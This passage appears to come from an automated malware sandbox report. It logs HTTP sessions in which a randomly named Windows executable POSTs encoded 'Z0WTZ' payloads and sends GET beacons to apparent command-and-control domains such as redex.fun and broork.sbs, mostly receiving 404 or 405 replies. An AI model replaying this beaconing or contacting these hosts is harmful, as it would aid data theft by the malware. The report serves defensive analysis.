                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Ascii: Z0WTZ=MaM2/a9Gy1cbOvEIWwqwFIZXwMJnZx1vC83c0S6/d2RLK8KmvQORVydUSa/AZ8E3yij9ldxyglhcxV0/NBUEnGSMfZ9yjeEV6DBiiDaVo6yyzv1mAp3zXJ6z1fY59BBv94ARIDRuWKi50NdrozBjTig0ad2e6doHmgtv31Ds22QqNJKCp7gza5PMt9e5agHBW4z/4XAHoX9ScrAeXdH0YCw=
Nov 2, 2024 08:13:54.087502003 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Sat, 02 Nov 2024 07:13:53 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 203
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uhg3/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.4 | 49371 | 195.110.124.133 | 80 | 3512 | C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 2, 2024 08:13:55.786317110 CET | 10903 | OUT | POST /uhg3/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.nutrigenfit.online
                                                                                                                              Origin: http://www.nutrigenfit.online
                                                                                                                              Referer: http://www.nutrigenfit.online/uhg3/
                                                                                                                              Content-Length: 10302
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Ascii: Z0WTZ=MaM2/a9Gy1cbOvEIWwqwFIZXwMJnZx1vC83c0S6/d2ZLLKemuymRUydUa6/BZ8E6yjKVla4Jgnpcx3s/LyMEuGSMT59/9uEM6DRuiCqVo6yyzpZmJcDzRJ6yyfY12hBX97xuICBYR5q53p5ruG1jbig2Zd2G6cUYmghJ30m320MqO4T29KgIAJr0y6qqWhPCe5OG4CUd80NHYrsWM+roL2FueRjmPFwNnYuAHwUiNVNPxL23PRFelu96azxPhmaLndRwbd9fjjLNdpyyzKPbxxDvdDXyMXgquF1HIVivm6eQ8v1/y9lYw88bJ0n2/aM6e8nbL5X93LJuedYuKvWhfEongmfOuX+TPvKwnAdKwjDrwKIDebni7Yrr8VWT1eoE4TS+I6bKTVt1W3yAruQfoRDmdq6F9h5s19rwIitzu8ILrw8I7/xqnYXxrPi0ln78SiGKdFqoRXKrDujFAMN19tBpm+S0jr38kB0pSblxpFVUCQYa0b2BlVMSVL3j2tviILX8i6Aqxb2Tx/iWDX+BxtK6rNYOgn1r76P3sTkuAMrOwCpQkQBuyqfE+ZkrTzoYhIuyPya/SL0XF6vcYugBrT6NqhB7UjHFLGB46wJmgg77kJLjPpGRb6P/uf0jEMUhx0j0EIrKfdlP/qDDmESq/+G2xiVFsZ5dKJksJgwbA7ThZVp4WqoVzJJvGH/26unFqe1Q37tVKq7tS8akGpKmvMFsxqKTIPJGRVNtGbJpqAeThRyptQSGdOGHIK3e7K57U4s9rNLv+deUQ9flkUxLsrLCr4VL/Ll9/7kJSVbT1lzIwFP6Cdzn+pMxIlMNcoWPr9aNJ94lNSrzHrlXR3tTBYLs01F0qhj1SlRBjIwSPRCCHse4Q2MC6fz73eIIOj29qe3+BcGP94SP7C7qMo1B+SMiyZ/6ajlA3+a8qhJkXwr/1eynXuu03NHdgBnVi70nnOjfTj7TYmT4RRk06IkZq1csGKdVqS5uUXJWmtgWeUKA6K [TRUNCATED]
Nov 2, 2024 08:13:56.643089056 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Sat, 02 Nov 2024 07:13:56 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 203
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uhg3/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.4 | 49372 | 195.110.124.133 | 80 | 3512 | C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 2, 2024 08:13:58.333332062 CET | 531 | OUT | GET /uhg3/?Z0WTZ=BYkW8sJ9y3cOHNEoRxCwA5Vo4ahPFjBVLPr9x2y6ZT42IcqGpiutRD9HR4qSfel6nhfbupoEu3BM2yJdNDd6onHQNeQ4qPh2tk8usD30jryO8epkJ7XZGNI=&SJuP9=UPQLWRgHAD_ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.nutrigenfit.online
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Nov 2, 2024 08:13:59.174343109 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Sat, 02 Nov 2024 07:13:59 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 203
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uhg3/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.4 | 49373 | 185.68.16.94 | 80 | 3512 | C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 2, 2024 08:14:04.413924932 CET | 774 | OUT | POST /pjcb/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.redex.fun
                                                                                                                              Origin: http://www.redex.fun
                                                                                                                              Referer: http://www.redex.fun/pjcb/
                                                                                                                              Content-Length: 202
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Ascii: Z0WTZ=rTQVOEt/uX++BvuxghZkdwm1Rf/jenCxPbXNAq3PdHDcSx3d/Duto4PjLsXzmHiYhqDq2lQdBgUZSiBN0107mGB+d8t1n5FmlO9vO/AYDBu9c36mxr21XpBh7DKtlEAs/HnbqL/wZGUs6E7W9M7fpT+Cxku+nzAWon8H7QRQQ4TIvVRjE28bZ92bR4b0yM7JJA==
Nov 2, 2024 08:14:05.317828894 CET | 332 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                              Server: nginx
                                                                                                                              Date: Sat, 02 Nov 2024 07:14:05 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              x-ray: p529:0.000
                                                                                                                              Data Ascii: 96<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.4 | 49374 | 185.68.16.94 | 80 | 3512 | C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 2, 2024 08:14:06.965349913 CET | 794 | OUT | POST /pjcb/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.redex.fun
                                                                                                                              Origin: http://www.redex.fun
                                                                                                                              Referer: http://www.redex.fun/pjcb/
                                                                                                                              Content-Length: 222
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Ascii: Z0WTZ=rTQVOEt/uX++DPexmCBkbQmye//jH3DZPbLNAoaKd0ncST/d+BKtp4PjScXyrniDhqPi2lcdBgAZSmRN1FI0nWB8Istrj5FmlO9vO+l9DBm9cDGmg622WpBi8DKtukAo/Hn5qKTOZAYs6FLW8d7c+D+EyUv2ji9/oXB71SI1dLSvuTc5VHdML9SoM/SA/PGASOrcy1DgwWjJHOarzqoiOuQ=
Nov 2, 2024 08:14:07.875579119 CET | 332 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                              Server: nginx
                                                                                                                              Date: Sat, 02 Nov 2024 07:14:07 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              x-ray: p529:0.000
                                                                                                                              Data Ascii: 96<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.4 | 49375 | 185.68.16.94 | 80 | 3512 | C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 2, 2024 08:14:09.509880066 CET | 10876 | OUT | POST /pjcb/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.redex.fun
                                                                                                                              Origin: http://www.redex.fun
                                                                                                                              Referer: http://www.redex.fun/pjcb/
                                                                                                                              Content-Length: 10302
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Raw: 5a 30 57 54 5a 3d 72 54 51 56 4f 45 74 2f 75 58 2b 2b 44 50 65 78 6d 43 42 6b 62 51 6d 79 65 2f 2f 6a 48 33 44 5a 50 62 4c 4e 41 6f 61 4b 64 30 76 63 53 67 6e 64 38 67 4b 74 37 49 50 6a 4e 73 58 4a 72 6e 6a 52 68 71 6e 6d 32 6c 42 6f 42 69 34 5a 54 42 35 4e 38 57 51 30 70 6d 42 38 51 63 74 32 6e 35 45 2b 6c 4f 73 6f 4f 2b 31 39 44 42 6d 39 63 46 69 6d 67 72 32 32 55 70 42 68 37 44 4b 62 6c 45 41 41 2f 48 2f 44 71 4b 6d 31 65 77 34 73 36 6c 62 57 2b 72 58 63 39 6a 2b 47 37 45 76 48 6a 69 78 6b 6f 55 30 4b 31 54 39 65 64 4d 69 76 75 56 4e 55 4c 55 4e 58 5a 62 2b 4d 66 2f 69 62 78 73 53 39 64 2b 76 43 69 6c 76 69 6d 56 50 39 45 5a 7a 43 6d 4c 41 6c 62 2b 74 55 53 65 63 76 51 48 50 79 37 6f 4c 61 55 43 43 72 36 71 2b 38 41 6c 6d 44 37 58 71 72 56 35 4b 37 78 71 78 57 6f 41 30 36 32 6d 4e 33 72 4a 62 38 30 39 33 49 52 6e 74 58 6c 67 36 73 65 77 45 67 38 52 63 69 68 70 64 52 6c 56 4d 49 35 74 69 54 48 79 5a 78 57 65 65 5a 4e 6e 35 7a 74 41 75 55 67 70 32 59 57 79 38 4c 4b 49 41 2b 35 78 5a 79 34 76 56 46 [TRUNCATED]
Data Ascii: Z0WTZ= [TRUNCATED]
Nov 2, 2024 08:14:10.455612898 CET | 332 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                              Server: nginx
                                                                                                                              Date: Sat, 02 Nov 2024 07:14:10 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              x-ray: p529:0.000
                                                                                                                              Data Ascii: 96<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.4 | 49376 | 185.68.16.94 | 80 | 3512 | C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 2, 2024 08:14:12.065160990 CET | 522 | OUT | GET /pjcb/?SJuP9=UPQLWRgHAD_&Z0WTZ=mR41NwlPpWSeNv3ogRNiaiaxYZXyC1SkAJjbD/qSc2ukVSLu6jyn16P/AoWnmXjc847+20hqOz4nW3sR+UY1qAEpIZA0h6plj49hN8QYEBC/SES4lZybD8k= HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.redex.fun
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Nov 2, 2024 08:14:12.999943972 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Sat, 02 Nov 2024 07:14:12 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              x-ray: p529:0.000
                                                                                                                              Data Ascii: 17d0<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "xhtml11.dtd"><html><head> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8" /> <TITLE> www.redex.fun </TITLE> <link rel="stylesheet" href="https://cdn.adm.tools/parking-page/style.css" type="text/css" /> <script> window.languages = { 'en': { 'title': 'Website www.redex.fun not configured on server', 'h1': 'Website www.redex.fun not configured on server', '.message1': 'Website <b>www.redex.fun</b> is not configured on the hosting server.', '.message2': 'Domain address record points to our server, but this site is not served.<br>If you have recently added a site to your control panel - wait 15 minutes and your site will start working.', '.help_button': 'How can I fix this?', }, 'pl': { 'title': 'Witryna www.redex.fun niesko [TRUNCATED]
Nov 2, 2024 08:14:12.999978065 CET | 212 | IN
                                                                                                                              Data Ascii: a www.redex.fun nieskonfigurowana na serwerze', '.message1': 'Witryna <b>www.redex.fun</b> nie jest skonfigurowana na serwerze hostingowym.', '.message2': 'Rekord adresu domeny wsk
Nov 2, 2024 08:14:12.999990940 CET | 1236 | IN
                                                                                                                              Data Ascii: azuje na nasz serwer, ale ta witryna nie jest obsugiwana.<br>Jeli niedawno dodae witryn do panelu sterowania - poczekaj 15 minut, a Twoja witryna zacznie dziaa.', '.help_button': 'Jak mog to naprawi?',
Nov 2, 2024 08:14:13.000019073 CET | 1236 | IN
                                                                                                                              Data Ascii: ge2': ' , .<br>
Nov 2, 2024 08:14:13.000034094 CET | 1236 | IN
                                                                                                                              Data Ascii: .', '.message2': ' , .<br>
Nov 2, 2024 08:14:13.000050068 CET | 636 | IN
                                                                                                                              Data Ascii: entListener("DOMContentLoaded", display); </script></head><body><div class="container"> <div class="content"> <div class="text"> <h1> www.redex.fun </h1>
Nov 2, 2024 08:14:13.000062943 CET | 486 | IN
                                                                                                                              Data Ascii: - 15 . </p> <a class="help_button" href="https://www.ukraine.com.ua/wiki/hosting/


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.4 | 49377 | 163.44.176.12 | 80 | 3512 | C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 2, 2024 08:14:18.761945009 CET | 777 | OUT | POST /51fd/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.broork.sbs
                                                                                                                              Origin: http://www.broork.sbs
                                                                                                                              Referer: http://www.broork.sbs/51fd/
                                                                                                                              Content-Length: 202
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Ascii: Z0WTZ=0V7BfKQhUsKv59GVJT+orKUfsRa5yVPHxdsX1zdq953Z35+ufewhfmvRXnJrACEQSleGfRo8/kiNC8v32KudRvBcmGefPiOsJ9M3UfAPnugEd3rX/ymBNC8Tm9KcPNqDLev9osRWCVoiRWJxi5JxeHbOR7Q0bFOX9uW1h6sZnbrmAfiwPcLUagxmCDt8s5ba+g==
Nov 2, 2024 08:14:19.625241041 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                              pragma: no-cache
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 1251
                                                                                                                              date: Sat, 02 Nov 2024 07:14:19 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              vary: User-Agent
                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0
Nov 2, 2024 08:14:19.625253916 CET | 271 | IN
                                                                                                                              Data Ascii: .15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this si


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.4 | 49378 | 163.44.176.12 | 80 | 3512 | C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 2, 2024 08:14:21.305398941 CET | 797 | OUT | POST /51fd/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.broork.sbs
                                                                                                                              Origin: http://www.broork.sbs
                                                                                                                              Referer: http://www.broork.sbs/51fd/
                                                                                                                              Content-Length: 222
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Ascii: Z0WTZ=0V7BfKQhUsKv292VM0CotqUcixa571OOxdgX1yZ66MHZ3YOuecIhYmvRfHIhECEXSlS0fTM8/kmNC9f3252eQ/BSumedACOsJ9M3Ubopnu4EdGbX8WKCSy8MxNKcLNqHLeuootc7CXAiRX5xjslyVHbIOrRgcXry5/najMEqiOPRFZvqetqDIgVVfEkIh6mTlosNj1Nk7BvCQ54hflJH9SA=
                                                                                                                              Nov 2, 2024 08:14:22.198544025 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                              pragma: no-cache
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 1251
                                                                                                                              date: Sat, 02 Nov 2024 07:14:22 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              vary: User-Agent
                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0
                                                                                                                              Nov 2, 2024 08:14:22.198559046 CET | 271 | IN
                                                                                                                              Data Ascii: .15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this si


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              39 | 192.168.2.4 | 49379 | 163.44.176.12 | 80 | 3512 | C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Nov 2, 2024 08:14:23.857414961 CET | 10879 | OUT | POST /51fd/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.broork.sbs
                                                                                                                              Origin: http://www.broork.sbs
                                                                                                                              Referer: http://www.broork.sbs/51fd/
                                                                                                                              Content-Length: 10302
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Nov 2, 2024 08:14:24.717592955 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                              pragma: no-cache
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 1251
                                                                                                                              date: Sat, 02 Nov 2024 07:14:24 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              vary: User-Agent
                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0
                                                                                                                              Nov 2, 2024 08:14:24.717608929 CET | 271 | IN
                                                                                                                              Data Ascii: .15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this si


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              40 | 192.168.2.4 | 49380 | 163.44.176.12 | 80 | 3512 | C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Nov 2, 2024 08:14:27.291881084 CET | 523 | OUT | GET /51fd/?Z0WTZ=5XThc+sTNfSc1dyVCHius6QJlgyE7UD3g9QPrW9D0ZCA6InRQfgmSS7sY3ZsEANqCFm0SxAy1XScT67z0IieRfxf0Cr6BzHBArQcGKRuou4FU1nhplefNR0=&SJuP9=UPQLWRgHAD_ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.broork.sbs
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Nov 2, 2024 08:14:28.163489103 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                              pragma: no-cache
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 1251
                                                                                                                              date: Sat, 02 Nov 2024 07:14:28 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              vary: User-Agent
